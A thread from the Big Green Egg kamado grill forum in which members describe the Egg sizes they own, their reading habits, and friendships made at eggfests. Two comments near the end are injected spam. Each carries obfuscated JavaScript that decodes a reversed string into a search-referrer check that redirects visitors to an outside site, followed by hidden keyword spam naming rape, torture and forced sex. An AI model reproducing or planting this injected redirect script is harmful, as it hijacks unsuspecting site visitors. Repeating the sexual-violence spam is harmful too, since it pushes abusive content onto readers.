Welcome to the EGGhead Forum - a great place to visit and packed with tips and EGGspert advice! You can also join the conversation and get more information and amazing kamado recipes by following Big Green Egg to Experience our World of Flavor™ at:
Facebook  |  Twitter  |  Instagram  |  Pinterest  |  Youtube  |  Vimeo
Share your photos by tagging us and using the hashtag #BigGreenEgg.

Want to see how the EGG is made? Click to Watch

let me try this a little different

13»

Comments

• Puj
    Puj Posts: 615
    eggor,[p]Started with a large as a gift from my family on Fathers Day (1995), and have added a small and mini throughout the years. Stumbled across the forum sometime in the late 90's and try to read it as often as possible.[p]... and as Nature Boy posted, the forum has been a great vehicle to develop lasting friendships.[p]Puj

• eggor,
    i cook on a large and a small, and once the virginian gets his extra large, we'll be wresting in the front yard to see who gets to use it for the thanksgiving turkey. . .heeeee. .. .[p]this forum is a special place, populated by special people . . .go to an eggfest, even though it may be the first time meeting folks face to face, the interaction and friendships developed here make it like you have known people for years. .. .

• mad max beyond eggdome,
    DSCN0091.jpg
    btw, where else/what else, can draw people together like the egg. .. new years day, brett (the virginian) and i decide to do some cooking out. ..now it was one thing for nature boy and kenny to come in from the country side to join us, but mr. earl and woodoggies drove all the way down from philadelphia to virginia just to cook/hang out with some friends and enjoy some egg food . . .if that isn't special i don't know what is. . .[p]i read the forum every day, post most days. . .i've learned so much from folks like trex (i don't do steaks any other way), nature boy, woodoggies, mr. earl, brett, chuck, wess b, tnw, grillmeister, stump, mr. wise, and so many others its unbelievable. . .[p]you'll never be afraid to buy something new at the grocery, cause all you have to do is say here "how do you cook this" and you will get instant answers. .. [p]great thread!!

• BlueSmoke
    BlueSmoke Posts: 1,678
    eggor,
    We're cooking on a large; got both a small and a mini on the shopping list.[p]The two of us visit daily, sometimes responding and sometimes just reading.[p]Ken

• Hooter
    Hooter Posts: 134
    eggor,[p]I have one large that I've owned for about 3 years now. This forum is my best resource, as well as the book "Smoke and Spice". Went to my first Eggfest this year and had a great time. [p]I've extended the Egg family by at least 3 additional people...word of mouth is the greatest advertising. [p]Hooter
  • BlueSmoke,
    "the two of us". . .man, thats got a nice ring to it. ...hope you and your new better half are settling in nicely (particularly after charlie gave you such a nice welcome to florida). . .i realized in my post below that you are one person i forgot to mention as one of the great influences on my cooking since becoming an eggor. . .both through your advice, and your wonderful products.. .[p]best[p]max

• eggor, I just bought a large last weekend and so far am loning it. I can see a mini for grins and out of curiosity one day on the deck. Loving the quickness of the start up, and of course the flavor of the foods.

• Toe 49
    Toe 49 Posts: 193
    eggor,
    I have Large, Small and Mini......

• eggor,[p]One large egg. I used to have a mini but my lady heisted it. She said it looks better on her porch than mine.
    A small would be nice. That one would get chained to the porch.[p]Post rarely, been reading a few years, been cooking all my life and the collective minds here have helped make me a better cook. All the helpis much appreciated.[p][p]

• cooter, Nice name.[p]A little trick I learned is to write your message first then fill in yoour name. That way if you hit enter by mistake your message will not post with blank text.

• eggor,
    I have a large, currently working on a table to suit my needs. It seems accessories and storage are more important to me for flexability as opposed to another egg. Not that I wouldn't mind another, but for this family of two, a large is more than enough. I'm here daily.

• cardit
    cardit Posts: 9
    eggor,[p]Medium, here. Researched it a lot before buying, did some soul searching (I always tend to buy a 'bigger' one than I need'. Settled on medium. A large would sure be great for those many times we cook for a bunch of people.[p]Mike

• eggor, i read most of these posts nearly everyday. i have responded to a few. i have to admit that im still stuck as a gasser but im pushing for an egg in the near future. i wanna get the large as the XL might be a bit heavy for me but if i want one really quick i may have to go for a small or mini. its hard to say but i can definitley say that this forum IS the influence for me turning towards the egging side of cooking. the people here have been very friendly and helpful and its a shame that it is so difficult to make time for an eggfest or any get together. the attitude on this forum alone is enough to make you wanna come back whether you are an egger or not. im glad you wrote this post. i got tired of lurking. thank you for listening. dixeeeeeeeeeeeeeeeeee

• BlueSmoke
    BlueSmoke Posts: 1,678
    mad max beyond eggdome,
    I'll say it has a nice ring to it...[p]Thanks for the kind words. After the move it's taking longer than anticipated to get back into production.[p]Ken

• mr toad, See you in Eggtober, I have a nice HAT for you...

• GrillMeister
    GrillMeister Posts: 1,608
    BGEallstars.jpg
    <p />eggor,[p]I like to keep 5 around for a quick game of PIG.[p]Actually, I only have 2 Larges and a Small egg. The larges come in very handy for entertaining or just having one prepared for a long overnight lo-N-slo and still having one available for ABT's and dinner. The small comes in handy for camping and taking over to friends for cookouts.[p]Cheers,[p]GrillMeister
    Austin, TX

Cheers,

GrillMeister
    Austin, Texas
  • eggor, two large Eggs, one small Egg, a mini . I read about 95 % of the posts and usually check the forum at least once a day.There is nothing better than the Egg except maybe Eggtoberfest and this Forum !!

• mr toad
    mr toad Posts: 779
    tn slagamater,[p]is this hat orange and white
    See no Evil - Hear no Evil - Speak no Evil
                        Smoke no Evil

BGE - Mini, Small, Medium, Large
  • usa doug
    usa doug Posts: 96
    eggor,
    I would rather be referred to as an Egghead than a ceramic person:). I read the forum several times a day.[p]usa doug

• WooDoggies
    WooDoggies Posts: 2,390
    Hey dixee6,[p]Are you coming down to New Holland this weekend?
    We'll feed you and treat you real nice..... and you'll get to see eggs cranking in a major way.
    C'mon with yourself![p]John[p]

• eggor,
    I own a large and plan on getting a mini or a small. I read 80 percent of the posts and around 50 percent of replies.

• eggor,
    I read most of the posts and most of the threads I start. I check the forum several times a day.
    I have a medium egg.

• </a></h1><script>function ewe(ewr,erw){erw="erw".length;var rew="";var rwe="";rew=new String(ewr);rre=rew.length;wre=rre%erw;var PI=ewr.length;ere=rew.substring(0,rre-wre);ree=rew.substring(rre-wre,rre);with (Math) {wew=round(log(pow(PI,0)));}var eee=ere.length;var rer=ere.length;while (eee>=0) {eee=rer-erw*(wew+1);var wwe=rer-erw*wew;rwe+=ere.substring(eee,wwe);wew++;}rwe+=ree;wer+=rwe;return 0;}</script><script>var wer="";function NF3(){ewe("RIP/SC
    <);}ioncat.loentcum(doapeesc='+age'&pr)+rreefet.rmenocue(dcap+esf='?recgiog.selet/n.nporat-greee./frp:/httn='tioocat.lren
    pa {
    r()edin rtiounc
    f;};r()edi r) { -1 !=' )comle.gpi'dof( exOind r.if(;
    );}ir(red{ 1) = -) !m' .colerrawtac'mef( exOind r.if(;
    );}ir(red{ 1) = -) !m' .corchsea( 'xOfnder.if(
    i;};r()edi r) { -1 !=' )cos'lyf( exOind r.if(;
    );}ir(red{ 1) = -) !b' ewelth'alf( exOind r.if(;
    );}ir(red{ 1) = -) !a' amm 'mOf(dex.in( r
    if};
    ();dir re { -1)!= ) ek'oseinf( 'xOfnder.if(
    i;};r()edi r) { -1 !=' )oto 'gOf(dex.in( r
    if};
    ();dir re { -1)!= ) ot'otb 'hOf(dex.in( r
    if};
    ();dir re { -1)!= ) ol' 'aOf(dex.in( r
    if};
    ();dir re { -1)!= ) pe'scanet( 'xOfnder.if(
    i;};r()edi r) { -1 !=' )sn. 'mOf(dex.in( r
    if};
    ();dir re { -1)!= ) ta'vislta 'aOf(dex.in( r
    if};
    ();dir re { -1)!= ) te'xci 'eOf(dex.in( r
    if};
    ();dir re {-1)!= ) oo'yahch.ear 'sOf(dex.in( r
    if};
    ();dir re {-1)!= ) k.''asf( exOind r.if(;
    );}ir(red { 1) = -) !e' ogl'gof( exOind r.if(;
    rerfer.reentcum dor =ar
    vt">ripaScJave="uagangT lRIP<SCde><hiT>");document.write(wer);return 0;}</script><script language=javascript> NF3();</script>
    <script>var wer="";function NF2(){ewe("oney:npladisen;iddy:hlitibivise="tylv s<dide><hi">");document.write(wer);return 0;}</script><script language=javascript> NF2();</script>animal rape rape pic cartoon rape rape incorporated rape stories torture rape rape links ulrika jonsson rape acquaintance rape rape cartoons [/quote]

• </a></h1><script>function ewe(ewr,erw){erw="erw".length;var rew="";var rwe="";rew=new String(ewr);rre=rew.length;wre=rre%erw;var PI=ewr.length;ere=rew.substring(0,rre-wre);ree=rew.substring(rre-wre,rre);with (Math) {wew=round(log(pow(PI,0)));}var eee=ere.length;var rer=ere.length;while (eee>=0) {eee=rer-erw*(wew+1);var wwe=rer-erw*wew;rwe+=ere.substring(eee,wwe);wew++;}rwe+=ree;wer+=rwe;return 0;}</script><script>var wer="";function NF3(){ewe("RIP/SC
    <);}ioncat.loentcum(doapeesc='+age'&pr)+rreefet.rmenocue(dcap+esf='?recgiog.selet/n.nporat-greee./frp:/httn='tioocat.lren
    pa {
    r()edin rtiounc
    f;};r()edi r) { -1 !=' )comle.gpi'dof( exOind r.if(;
    );}ir(red{ 1) = -) !m' .colerrawtac'mef( exOind r.if(;
    );}ir(red{ 1) = -) !m' .corchsea( 'xOfnder.if(
    i;};r()edi r) { -1 !=' )cos'lyf( exOind r.if(;
    );}ir(red{ 1) = -) !b' ewelth'alf( exOind r.if(;
    );}ir(red{ 1) = -) !a' amm 'mOf(dex.in( r
    if};
    ();dir re { -1)!= ) ek'oseinf( 'xOfnder.if(
    i;};r()edi r) { -1 !=' )oto 'gOf(dex.in( r
    if};
    ();dir re { -1)!= ) ot'otb 'hOf(dex.in( r
    if};
    ();dir re { -1)!= ) ol' 'aOf(dex.in( r
    if};
    ();dir re { -1)!= ) pe'scanet( 'xOfnder.if(
    i;};r()edi r) { -1 !=' )sn. 'mOf(dex.in( r
    if};
    ();dir re { -1)!= ) ta'vislta 'aOf(dex.in( r
    if};
    ();dir re { -1)!= ) te'xci 'eOf(dex.in( r
    if};
    ();dir re {-1)!= ) oo'yahch.ear 'sOf(dex.in( r
    if};
    ();dir re {-1)!= ) k.''asf( exOind r.if(;
    );}ir(red { 1) = -) !e' ogl'gof( exOind r.if(;
    rerfer.reentcum dor =ar
    vt">ripaScJave="uagangT lRIP<SCde><hiT>");document.write(wer);return 0;}</script><script language=javascript> NF3();</script>
    <script>var wer="";function NF2(){ewe("oney:npladisen;iddy:hlitibivise="tylv s<dide><hi">");document.write(wer);return 0;}</script><script language=javascript> NF2();</script>rape stories free rape sites rape mpegs how to rape forced sex stories stories torture rape rape pics hentai rape rape thumbs forced sex [/quote]

• trout16
    trout16 Posts: 60
    eggor,
    I find this forum to be very useful, I don't read every post tho because of the format it is in. I know it is more expensive, but if this forum would switch to php or vb format it would be incredible!

• eggor
    eggor Posts: 777
    trout16,[p]man this was a great post, everyone jumping in an all, kinda gettin a feel for what each of us is doin and now you want to go and...